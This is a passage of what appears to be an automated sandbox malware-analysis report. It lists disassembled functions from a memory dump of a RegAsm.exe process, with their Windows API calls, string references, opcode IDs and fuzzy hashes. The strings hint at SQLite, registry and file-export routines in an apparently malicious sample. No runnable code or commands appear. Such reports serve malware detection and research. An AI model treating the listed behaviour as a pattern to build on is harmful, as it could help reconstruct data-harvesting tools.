                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                          Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                          Download Yara Rule
                          APIs
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                          • wcscpy.MSVCRT ref: 0040A0D9
                          • wcscat.MSVCRT ref: 0040A0E6
                          • wcscat.MSVCRT ref: 0040A0F5
                          • wcscpy.MSVCRT ref: 0040A107
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                          • String ID:
                          • API String ID: 1331804452-0
                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                          Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • <?xml version="1.0" ?>, xrefs: 0041007C
                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                          • <%s>, xrefs: 004100A6
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$_snwprintf
                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                          • API String ID: 3473751417-2880344631
                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                          Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: wcscat$_snwprintfmemset
                          • String ID: %2.2X
                          • API String ID: 2521778956-791839006
                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                          Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _snwprintfwcscpy
                          • String ID: dialog_%d$general$menu_%d$strings
                          • API String ID: 999028693-502967061
                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                          Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                            • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                            • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                          • memset.MSVCRT ref: 0040C439
                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                          • _wcsupr.MSVCRT ref: 0040C481
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                          • memset.MSVCRT ref: 0040C4D0
                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                          • String ID:
                          • API String ID: 4131475296-0
                          • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                          • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                          Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004116FF
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                          • API String ID: 2618321458-3614832568
                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                          Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AttributesFilefreememset
                          • String ID:
                          • API String ID: 2507021081-0
                          • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                          • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                          Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                          • malloc.MSVCRT ref: 00417524
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                          • free.MSVCRT ref: 00417544
                          • free.MSVCRT ref: 00417562
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharMultiWidefree$ApisFilemalloc
                          • String ID:
                          • API String ID: 4131324427-0
                          • Opcode ID: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                          • Opcode Fuzzy Hash: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                          Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                          Download Yara Rule
                          APIs
                          • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                          • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                          • free.MSVCRT ref: 0041822B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: PathTemp$free
                          • String ID: %s\etilqs_$etilqs_
                          • API String ID: 924794160-1420421710
                          • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                          • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                          Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ErrorLastMessage_snwprintf
                          • String ID: Error$Error %d: %s
                          • API String ID: 313946961-1552265934
                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                          Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                          • API String ID: 3510742995-272990098
                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                          Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0044A6EB
                          • memset.MSVCRT ref: 0044A6FB
                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                          • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: gj
                          • API String ID: 1297977491-4203073231
                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                          Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                          Download Yara Rule
                          APIs
                          • AreFileApisANSI.KERNEL32 ref: 00417497
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                          • malloc.MSVCRT ref: 004174BD
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                          • free.MSVCRT ref: 004174E4
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                          • String ID:
                          • API String ID: 4053608372-0
                          • Opcode ID: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                          • Opcode Fuzzy Hash: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                          Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(?), ref: 0040D453
                          • GetWindowRect.USER32(?,?), ref: 0040D460
                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Window$Rect$ClientParentPoints
                          • String ID:
                          • API String ID: 4247780290-0
                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                          Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                          • memset.MSVCRT ref: 004450CD
                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                          • CloseHandle.KERNEL32(00000000), ref: 004450F7
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                          • String ID:
                          • API String ID: 1471605966-0
                          • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                          • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                          Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                          • wcscpy.MSVCRT ref: 0044475F
                          • wcscat.MSVCRT ref: 0044476E
                          • wcscat.MSVCRT ref: 0044477F
                          • wcscat.MSVCRT ref: 0044478E
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                          • String ID: \StringFileInfo\
                          • API String ID: 102104167-2245444037
                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                          Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                          Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004100FB
                          • memset.MSVCRT ref: 00410112
                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                          • _snwprintf.MSVCRT ref: 00410141
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$_snwprintf_wcslwrwcscpy
                          • String ID: </%s>
                          • API String ID: 3400436232-259020660
                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                          Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040D58D
                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ChildEnumTextWindowWindowsmemset
                          • String ID: caption
                          • API String ID: 1523050162-4135340389
                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                          Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                          • String ID: MS Sans Serif
                          • API String ID: 210187428-168460110
                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                          Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                          • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                          • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                          • memcmp.MSVCRT ref: 0041D8CB
                          • memcmp.MSVCRT ref: 0041D913
                          • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$memcmp
                          • String ID:
                          • API String ID: 3384217055-0
                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                          Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040560C
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
